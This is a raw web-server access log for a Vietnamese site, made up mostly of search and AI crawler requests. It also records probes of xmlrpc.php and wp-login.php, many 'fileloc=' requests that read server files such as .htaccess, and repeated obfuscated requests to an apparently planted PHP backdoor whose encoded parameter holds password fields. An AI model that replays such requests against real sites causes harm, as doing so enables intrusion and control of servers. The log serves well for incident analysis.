74.7.227.114 - - [04/Nov/2025:03:58:32 +0000] "GET /q-~182WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49145/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 5692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.128.139 - - [04/Nov/2025:03:58:33 +0000] "GET /q-~98TVb2eFOGv28NRKwJjUEkHXzvOChUhc22061 HTTP/1.1" 200 4360 "https://lamphimquangcao.net/sitemap757.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.66.163 - - [04/Nov/2025:03:58:35 +0000] "GET /?products=381627278 HTTP/1.1" 200 24340 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.248.20 - - [04/Nov/2025:03:58:40 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323230302p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383630302q3666633961336238363632613235356531643133626666303235666266343533222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.114 - - [04/Nov/2025:03:58:40 +0000] "GET /q-~221WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49106/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 5692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:03:58:52 +0000] "GET /q-~221WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49106/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/.htaccess&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3155 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.71.1 - - [04/Nov/2025:03:58:55 +0000] "GET /?products=881556568 HTTP/1.1" 200 23781 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.248.20 - - [04/Nov/2025:03:59:02 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323232322p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383632322q3461613939333332393464656531316331643633646331633831366633353833222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.114 - - [04/Nov/2025:03:59:02 +0000] "GET /q-~221WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49106/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/license.txt&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 9991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:03:59:08 +0000] "GET /q-~77Dw210el4rFx36W0B5mEi2ZQTp9gSax42714/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/.htaccess&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:03:59:15 +0000] "GET /q-~235o90CQ6KG7T8pfMjWQe4iBwYWLAVDxT41116/ HTTP/1.1" 200 4365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.66.163 - - [04/Nov/2025:03:59:15 +0000] "GET /?products=1770070352 HTTP/1.1" 200 25937 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.114 - - [04/Nov/2025:03:59:22 +0000] "GET /q-~297je97355774HQ4Sgq6I6f76ENO1fECJ39816/ HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.182 - - [04/Nov/2025:03:59:22 +0000] "GET / HTTP/1.1" 200 4360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [04/Nov/2025:03:59:24 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323234342p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383634342q6261653662326239356637346336373737323133323336386431303830333963222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.114 - - [04/Nov/2025:03:59:27 +0000] "GET /q-~247suhjwGvXWz1k4ZPhLA6l4mMeXY21En5550/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 5692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.66.163 - - [04/Nov/2025:03:59:36 +0000] "GET /?products=1701633548 HTTP/1.1" 200 26023 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.199.58.190 - - [04/Nov/2025:03:59:37 +0000] "POST /xmlrpc.php HTTP/1.1" 403 250 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; MAGWJS; rv:11.0) like Gecko"
51.79.248.20 - - [04/Nov/2025:03:59:46 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323236362p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383636362q6636393535343439633034666335376433356532663631376337336165333234222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
114.119.152.32 - - [04/Nov/2025:03:59:53 +0000] "GET /q-~98TNK793FizKtLla96VQfjGJgbPtuLNY1549 HTTP/1.1" 200 4360 "https://lamphimquangcao.net/sitemap770.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.71.1 - - [04/Nov/2025:03:59:56 +0000] "GET /?products=35521008 HTTP/1.1" 200 24587 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.248.20 - - [04/Nov/2025:04:00:03 +0000] "GET / HTTP/1.1" 200 4360 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
51.79.248.20 - - [04/Nov/2025:04:00:08 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323238382p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383638382q3365353934316337356539626333653166346562623565353365393965613132222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
66.249.66.163 - - [04/Nov/2025:04:00:16 +0000] "GET /?products=1233319278 HTTP/1.1" 200 25993 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.248.20 - - [04/Nov/2025:04:00:30 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323331302p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383731302q3038383962636439616137323761383331636164343966313039386538386265222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
66.249.66.164 - - [04/Nov/2025:04:00:37 +0000] "GET /?products=1701737958 HTTP/1.1" 200 25756 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.248.20 - - [04/Nov/2025:04:00:52 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323333322p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383733322q3464373237343631346330333265306265616334643933306334363034663063222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
66.249.66.163 - - [04/Nov/2025:04:00:57 +0000] "GET /?products=1234676000 HTTP/1.1" 200 26859 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.248.20 - - [04/Nov/2025:04:01:14 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323335342p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383735342q6563616565386264666139376238363231613230396564346136333139333435222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
114.119.132.10 - - [04/Nov/2025:04:01:17 +0000] "GET /q-~98T3KBFMuMpguCRZQGjdpNTem7Zu1uIR45561 HTTP/1.1" 200 4360 "https://lamphimquangcao.net/sitemap537.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
51.79.248.20 - - [04/Nov/2025:04:01:36 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323337362p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383737362q3963633666393334303730303765333331383165376362613361613066363530222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
66.249.71.2 - - [04/Nov/2025:04:01:38 +0000] "GET /?products=1234411046 HTTP/1.1" 200 25369 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.248.20 - - [04/Nov/2025:04:01:58 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323339382p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383739382q3862303235663563653361356535366437303630333435393336383130333839222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
66.249.66.164 - - [04/Nov/2025:04:02:19 +0000] "GET /?products=1701567530 HTTP/1.1" 200 26057 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.248.20 - - [04/Nov/2025:04:02:20 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323432302p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383832302q6134353164343130623637303930336537373433653636333461313563346435222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
66.249.66.164 - - [04/Nov/2025:04:02:39 +0000] "GET /?products=1677300820 HTTP/1.1" 200 25753 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.143.51 - - [04/Nov/2025:04:02:41 +0000] "GET /q-~98STmAsVRal99tL3iRKO2e5lsZXn9haU47589 HTTP/1.1" 200 4360 "https://lamphimquangcao.net/sitemap800.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
51.79.248.20 - - [04/Nov/2025:04:02:43 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323434332p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383834332q3631386534326537613865396165643539656536366237656438616238366261222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
66.249.66.163 - - [04/Nov/2025:04:03:01 +0000] "GET /?products=381892650 HTTP/1.1" 200 24860 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.114 - - [04/Nov/2025:04:03:04 +0000] "GET /q-~213h3uxM3kpgi19sZy5wdY7NQKGcmxUzO15558/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 5692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [04/Nov/2025:04:03:05 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323436352p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383836352q3639353763393438633337336232376536343535626564633633323161303330222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.114 - - [04/Nov/2025:04:03:10 +0000] "GET /q-~247suhjwGvXWz1k4ZPhLA6l4mMeXY21En5550/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/robots.txt&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 2725 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:03:16 +0000] "GET /q-~235o90CQ6KG7T8pfMjWQe4iBwYWLAVDxT41116/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/robots.txt&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 2725 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:03:20 +0000] "GET /q-~182WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49145/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/robots.txt&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 2725 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.66.163 - - [04/Nov/2025:04:03:22 +0000] "GET /?products=1843130778 HTTP/1.1" 200 26048 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.114 - - [04/Nov/2025:04:03:24 +0000] "GET /q-~235o90CQ6KG7T8pfMjWQe4iBwYWLAVDxT41116/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/readme.html&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 5692 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [04/Nov/2025:04:03:27 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323438372p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383838372q6432316465393537323761636531363730663938376431306637323938323739222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
66.249.66.163 - - [04/Nov/2025:04:03:43 +0000] "GET /?products=1231383352 HTTP/1.1" 200 25622 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.248.20 - - [04/Nov/2025:04:03:49 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323530392p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383930392q6339643565616239336664336161373839346130333130393031643364613266222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
107.189.30.207 - - [04/Nov/2025:04:04:04 +0000] "GET /wp-login.php HTTP/1.1" 200 4360 "https://www.yahoo.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.117 Safari/537.36"
66.249.71.1 - - [04/Nov/2025:04:04:05 +0000] "GET /?products=1615966914 HTTP/1.1" 200 25860 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.154.211 - - [04/Nov/2025:04:04:09 +0000] "GET /q-~98SHGwK0ajtA92NNWot7kyb6vYoGeH4R659 HTTP/1.1" 200 4360 "https://lamphimquangcao.net/sitemap546.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
51.79.248.20 - - [04/Nov/2025:04:04:11 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323533312p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383933312q6133376336363363316330393530613737393038613064633031633964633164222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
51.79.248.20 - - [04/Nov/2025:04:04:33 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323535332p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383935332q3031363430336232643734316430663433376466353266323337316131376261222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
66.249.66.164 - - [04/Nov/2025:04:04:46 +0000] "GET /?products=1677316194 HTTP/1.1" 200 26382 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.248.20 - - [04/Nov/2025:04:04:55 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323537352p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383937352q3138313463633033336361643231386339373066346264363162396634313532222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
66.249.71.3 - - [04/Nov/2025:04:05:07 +0000] "GET /?products=1677212296 HTTP/1.1" 200 25615 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.114 - - [04/Nov/2025:04:05:08 +0000] "GET /q-~213h3uxM3kpgi19sZy5wdY7NQKGcmxUzO15558/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/robots.txt&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 2725 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
63.250.38.117 - - [04/Nov/2025:04:05:11 +0000] "POST /xmlrpc.php HTTP/1.1" 200 4360 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
74.7.227.114 - - [04/Nov/2025:04:05:13 +0000] "GET /q-~235o90CQ6KG7T8pfMjWQe4iBwYWLAVDxT41116/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/license.txt&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 9991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:05:16 +0000] "GET /q-~221WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49106/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/robots.txt&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 2725 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [04/Nov/2025:04:05:17 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323233323539372p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323232383939372q3138653536656364383236656261666635326265373136666230613736356530222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
74.7.227.114 - - [04/Nov/2025:04:05:22 +0000] "GET /q-~182WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49145/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/license.txt&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 9991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:05:25 +0000] "GET /q-~182WluG5E5kMhhhyzY6T6e9cAmbsJM3pj49145/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/.htaccess&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.114 - - [04/Nov/2025:04:05:29 +0000] "GET /q-~235o90CQ6KG7T8pfMjWQe4iBwYWLAVDxT41116/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/.htaccess&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.156.142 - - [04/Nov/2025:04:05:31 +0000] "GET /q-~98S9NfOOESpO3O5Avjz6l5bpS8P90RdP12863 HTTP/1.1" 200 4365 "https://lamphimquangcao.net/sitemap800.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
74.7.227.114 - - [04/Nov/2025:04:05:35 +0000] "GET /q-~213h3uxM3kpgi19sZy5wdY7NQKGcmxUzO15558/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/license.txt&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 9991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
